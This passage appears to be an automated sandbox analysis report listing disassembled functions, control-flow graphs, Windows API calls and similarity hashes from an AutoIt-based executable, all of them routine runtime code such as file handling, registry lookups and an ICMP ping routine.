                                                                                                                                                                                                                                                                              Function 007309DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 412 7309db-730a0b call 7307af 415 730a26-730a32 call 725594 412->415 416 730a0d-730a18 call 71f636 412->416 421 730a34-730a49 call 71f636 call 71f649 415->421 422 730a4b-730a94 call 73071a 415->422 423 730a1a-730a21 call 71f649 416->423 421->423 431 730b01-730b0a GetFileType 422->431 432 730a96-730a9f 422->432 433 730cfd-730d03 423->433 434 730b53-730b56 431->434 435 730b0c-730b3d GetLastError call 71f613 CloseHandle 431->435 437 730aa1-730aa5 432->437 438 730ad6-730afc GetLastError call 71f613 432->438 440 730b58-730b5d 434->440 441 730b5f-730b65 434->441 435->423 449 730b43-730b4e call 71f649 435->449 437->438 442 730aa7-730ad4 call 73071a 437->442 438->423 446 730b69-730bb7 call 7254dd 440->446 441->446 447 730b67 441->447 442->431 442->438 455 730bc7-730beb call 7304cd 446->455 456 730bb9-730bc5 call 73092b 446->456 447->446 449->423 462 730bfe-730c41 455->462 463 730bed 455->463 456->455 461 730bef-730bf9 call 728a2e 456->461 461->433 465 730c43-730c47 462->465 466 730c62-730c70 462->466 463->461 465->466 468 730c49-730c5d 465->468 469 730c76-730c7a 466->469 470 730cfb 466->470 468->466 469->470 471 730c7c-730caf CloseHandle call 73071a 469->471 470->433 474 730ce3-730cf7 471->474 475 730cb1-730cdd GetLastError call 71f613 call 7256a6 471->475 474->470 475->474
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0073071A: CreateFileW.KERNEL32(00000000,00000000,?,00730A84,?,?,00000000,?,00730A84,00000000,0000000C), ref: 00730737
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00730AEF
                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00730AF6
                                                                                                                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 00730B02
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00730B0C
                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00730B15
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00730B35
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00730C7F
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00730CB1
                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00730CB8
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                              • Opcode ID: 595abe8638acf642a828c8a67f23ce9ea7056ba97a0a00895d8cd9a4298f542b
                                                                                                                                                                                                                                                                              • Instruction ID: 73e1d6c22e9457f1394380584067b279f43ff814ab968a375aa0a4542e6041b5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 595abe8638acf642a828c8a67f23ce9ea7056ba97a0a00895d8cd9a4298f542b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8A11632A041488FEF19AF68EC66BAD7BA0AF06324F14415DF811DB2D2D7399D12CB95
                                                                                                                                                                                                                                                                              Function 006F52A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00734B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 006F55B2
                                                                                                                                                                                                                                                                                • Part of subcall function 006F5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006F525A
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 006F53C4
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00734BFD
                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00734C3E
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00734C80
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00734CE7
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00734CF6
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                              • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                              • Opcode ID: 45694ad0c10f0b0e0b76dd50b3422d9c383cdc51633e5bcf9b3f4965235573d6
                                                                                                                                                                                                                                                                              • Instruction ID: c9252f4e8b1c0e6667c3c08646d3dc27e84ccc6f1b2f9ac4786359d1a20d3a23
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45694ad0c10f0b0e0b76dd50b3422d9c383cdc51633e5bcf9b3f4965235573d6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9071CF711043449FC704EF29EC85DABBBE8FF88340F40852EF541871A1EB799A48CB9A
                                                                                                                                                                                                                                                                              Function 006F34D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 006F34DE
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 006F34ED
                                                                                                                                                                                                                                                                              • LoadIconW.USER32(00000063), ref: 006F3503
                                                                                                                                                                                                                                                                              • LoadIconW.USER32(000000A4), ref: 006F3515
                                                                                                                                                                                                                                                                              • LoadIconW.USER32(000000A2), ref: 006F3527
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 006F353F
                                                                                                                                                                                                                                                                              • RegisterClassExW.USER32(?), ref: 006F3590
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3624: GetSysColorBrush.USER32(0000000F), ref: 006F3657
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3624: RegisterClassExW.USER32(00000030), ref: 006F3681
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006F3692
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3624: InitCommonControlsEx.COMCTL32(?), ref: 006F36AF
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006F36BF
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3624: LoadIconW.USER32(000000A9), ref: 006F36D5
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006F36E4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                              • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                              • Opcode ID: b6c08c0f1b5e66e52c91747a9d47a37e45d42bba70b2ffb20f9766ce6e8330b6
                                                                                                                                                                                                                                                                              • Instruction ID: 50fcb46d72aa64b169a3f956cb5c401ff95ec3ef62c391ce9b3322896b028967
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6c08c0f1b5e66e52c91747a9d47a37e45d42bba70b2ffb20f9766ce6e8330b6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40214F70D40398ABDB109FA5EC55FA97FB5FB08750F10802EEA04A62A1D7BD4946CF98
                                                                                                                                                                                                                                                                              Function 00770FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 553 770fb8-770fef call 6fe6a0 556 770ff1-770ffe call 6fc98d 553->556 557 77100f-771021 WSAStartup 553->557 556->557 565 771000-77100b call 6fc98d 556->565 558 771054-771091 call 70c1f6 call 6f8ec0 call 70f9d4 inet_addr gethostbyname 557->558 559 771023-771031 557->559 576 771093-7710a0 IcmpCreateFile 558->576 577 7710a2-7710b0 558->577 561 771036-771046 559->561 562 771033 559->562 566 77104b-77104f 561->566 567 771048 561->567 562->561 565->557 570 771249-771251 566->570 567->566 576->577 578 7710d3-771100 call 71017b call 6f423c 576->578 579 7710b5-7710c5 577->579 580 7710b2 577->580 589 771102-771129 IcmpSendEcho 578->589 590 77112b-771148 IcmpSendEcho 578->590 581 7710c7 579->581 582 7710ca-7710ce 579->582 580->579 581->582 584 771240-771244 call 6fbd98 582->584 584->570 591 77114c-77114e 589->591 590->591 592 771150-771155 591->592 593 7711ae-7711bc 591->593 596 77115b-771160 592->596 597 7711f8-77120a call 6fe6a0 592->597 594 7711c1-7711c8 593->594 595 7711be 593->595 601 7711e4-7711ed 594->601 595->594 598 771162-771167 596->598 599 7711ca-7711d8 596->599 611 771210 597->611 612 77120c-77120e 597->612 598->593 604 771169-77116e 598->604 606 7711dd 599->606 607 7711da 599->607 602 7711f2-7711f6 601->602 603 7711ef 601->603 608 771212-771229 IcmpCloseHandle WSACleanup 602->608 603->602 609 771193-7711a1 604->609 610 771170-771175 604->610 606->601 607->606 608->584 616 77122b-77123d call 71013d call 710184 608->616 614 7711a6-7711ac 609->614 615 7711a3 609->615 610->599 613 771177-771185 610->613 611->608 612->608 617 771187 613->617 618 77118a-771191 613->618 614->601 615->614 616->584 617->618 618->601
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • WSAStartup.WS2_32(00000101,?), ref: 00771019
                                                                                                                                                                                                                                                                              • inet_addr.WSOCK32(?), ref: 00771079
                                                                                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 00771085
                                                                                                                                                                                                                                                                              • IcmpCreateFile.IPHLPAPI ref: 00771093
                                                                                                                                                                                                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00771123
                                                                                                                                                                                                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00771142
                                                                                                                                                                                                                                                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 00771216
                                                                                                                                                                                                                                                                              • WSACleanup.WSOCK32 ref: 0077121C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                              • String ID: Ping
                                                                                                                                                                                                                                                                              • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                              • Opcode ID: 397752335095d3faa3a95f15ede168a9c43f7340ea7c1b12c3c842d9d44d4a1d
                                                                                                                                                                                                                                                                              • Instruction ID: 9ceb7ad20790c7131f75f571127b99b083e3f870f422ece59387d822f0711815
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 397752335095d3faa3a95f15ede168a9c43f7340ea7c1b12c3c842d9d44d4a1d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79919E316042019FDB20DF19C888F26BBE1BF44358F95C5A9E569CF6A2C739ED85CB81
                                                                                                                                                                                                                                                                              Function 006FF6D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID: Variable must be of type 'Object'.$t5|$t5|$t5|$t5|$t5|t5|
                                                                                                                                                                                                                                                                              • API String ID: 0-2942055604
                                                                                                                                                                                                                                                                              • Opcode ID: a84de830c7e768703c59ee69d2a5c131f09586384e3011ac8360506ea95fff21
                                                                                                                                                                                                                                                                              • Instruction ID: 633dfab2bb0c4b41b26c1426a6e129aa3bf64be28311f316a0992ac25cb10655
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a84de830c7e768703c59ee69d2a5c131f09586384e3011ac8360506ea95fff21
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FC27D71A00219DFCB24CF58D884BBDB7F2BF09310F248169EA15AB391D779AD41DB91
                                                                                                                                                                                                                                                                              Function 00700340 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 007015F2
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                              • String ID: t5|$t5|$t5|$t5|$t5|t5|
                                                                                                                                                                                                                                                                              • API String ID: 1385522511-1033926845
                                                                                                                                                                                                                                                                              • Opcode ID: 19452d6965e16e979df55829b56c302b8086853eafeb9e20e476f8570de4e7e0
                                                                                                                                                                                                                                                                              • Instruction ID: b83ec5532db19ed2ef39220710deb112a685a65924f22e6b6bbbbd28d01e1372
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19452d6965e16e979df55829b56c302b8086853eafeb9e20e476f8570de4e7e0
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4B26C74A08341CFDB24CF18C480B6AB7E1BF99324F548A5DE9858B391D779ED81CB92
                                                                                                                                                                                                                                                                              Function 006F2793 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153comCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006F32AF
                                                                                                                                                                                                                                                                                • Part of subcall function 006F327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 006F32B7
                                                                                                                                                                                                                                                                                • Part of subcall function 006F327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006F32C2
                                                                                                                                                                                                                                                                                • Part of subcall function 006F327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006F32CD
                                                                                                                                                                                                                                                                                • Part of subcall function 006F327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 006F32D5
                                                                                                                                                                                                                                                                                • Part of subcall function 006F327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 006F32DD
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3205: RegisterWindowMessageW.USER32(00000004,?,006F2964), ref: 006F325D
                                                                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006F2A0A
                                                                                                                                                                                                                                                                              • OleInitialize.OLE32 ref: 006F2A28
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 00733A0D
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                              • String ID: (&|$0$|$4'|$d(|$$|
                                                                                                                                                                                                                                                                              • API String ID: 1986988660-3251887934
                                                                                                                                                                                                                                                                              • Opcode ID: d5c133fcbad624d0e442e15160dbf4fcdf7d9e9f04e17b45bcdc0f35e694514a
                                                                                                                                                                                                                                                                              • Instruction ID: 2b508a256fcdcb0923e30d763b35e74bbe8e52b23e50f63daf17ed74f2cb5580
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5c133fcbad624d0e442e15160dbf4fcdf7d9e9f04e17b45bcdc0f35e694514a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71718DB09013458F8398EF69B969E263BE1BB48304750C1AED508C73A3EBBC59538F5C
                                                                                                                                                                                                                                                                              Function 007290C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 1633 7290c5-7290d5 1634 7290d7-7290ea call 71f636 call 71f649 1633->1634 1635 7290ef-7290f1 1633->1635 1649 729471 1634->1649 1637 7290f7-7290fd 1635->1637 1638 729459-729466 call 71f636 call 71f649 1635->1638 1637->1638 1641 729103-72912e 1637->1641 1655 72946c call 722b5c 1638->1655 1641->1638 1644 729134-72913d 1641->1644 1647 729157-729159 1644->1647 1648 72913f-729152 call 71f636 call 71f649 1644->1648 1652 729455-729457 1647->1652 1653 72915f-729163 1647->1653 1648->1655 1654 729474-729479 1649->1654 1652->1654 1653->1652 1657 729169-72916d 1653->1657 1655->1649 1657->1648 1658 72916f-729186 1657->1658 1661 7291a3-7291ac 1658->1661 1662 729188-72918b 1658->1662 1666 7291ca-7291d4 1661->1666 1667 7291ae-7291c5 call 71f636 call 71f649 call 722b5c 1661->1667 1664 729195-72919e 1662->1664 1665 72918d-729193 1662->1665 1668 72923f-729259 1664->1668 1665->1664 1665->1667 1670 7291d6-7291d8 1666->1670 1671 7291db-7291dc call 723b93 1666->1671 1698 72938c 1667->1698 1673 72925f-72926f 1668->1673 1674 72932d-729336 call 72fc1b 1668->1674 1670->1671 1676 7291e1-7291f9 call 722d38 * 2 1671->1676 1673->1674 1679 729275-729277 1673->1679 1687 729338-72934a 1674->1687 1688 7293a9 1674->1688 1702 729216-72923c call 7297a4 1676->1702 1703 7291fb-729211 call 71f649 call 71f636 1676->1703 1679->1674 1680 72927d-7292a3 1679->1680 1680->1674 1684 7292a9-7292bc 1680->1684 1684->1674 1689 7292be-7292c0 1684->1689 1687->1688 1693 72934c-72935b GetConsoleMode 1687->1693 1691 7293ad-7293c5 ReadFile 1688->1691 1689->1674 1694 7292c2-7292ed 1689->1694 1696 729421-72942c GetLastError 1691->1696 1697 7293c7-7293cd 1691->1697 1693->1688 1699 72935d-729361 1693->1699 1694->1674 1701 7292ef-729302 1694->1701 1704 729445-729448 1696->1704 1705 72942e-729440 call 71f649 call 71f636 1696->1705 1697->1696 1706 7293cf 1697->1706 1700 72938f-729399 call 722d38 1698->1700 1699->1691 1707 729363-72937d ReadConsoleW 1699->1707 1700->1654 1701->1674 1709 729304-729306 1701->1709 1702->1668 1703->1698 1716 729385-72938b call 71f613 1704->1716 1717 72944e-729450 1704->1717 1705->1698 1713 7293d2-7293e4 1706->1713 1714 72939e-7293a7 1707->1714 1715 72937f GetLastError 1707->1715 1709->1674 1720 729308-729328 1709->1720 1713->1700 1724 7293e6-7293ea 1713->1724 1714->1713 1715->1716 1716->1698 1717->1700 1720->1674 1728 729403-72940e 1724->1728 1729 7293ec-7293fc call 728de1 1724->1729 1730 729410 call 728f31 1728->1730 1731 72941a-72941f call 728c21 1728->1731 1738 7293ff-729401 1729->1738 1739 729415-729418 1730->1739 1731->1739 1738->1700 1739->1738
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 3083f7ff3390128b8cd5b876a80ed5e247f5492d1dc4e0bd9be8e9fcca3f1a7f
                                                                                                                                                                                                                                                                              • Instruction ID: 8fb4391b21fcdff3ca4f708c750d291b9202d7108e2b4e9376fb2af7cb6260b8
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3083f7ff3390128b8cd5b876a80ed5e247f5492d1dc4e0bd9be8e9fcca3f1a7f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DC1C2B0D04269EFDF11EFA8E845BADBBB0AF09310F184159E654A73D2C7389D42CB61
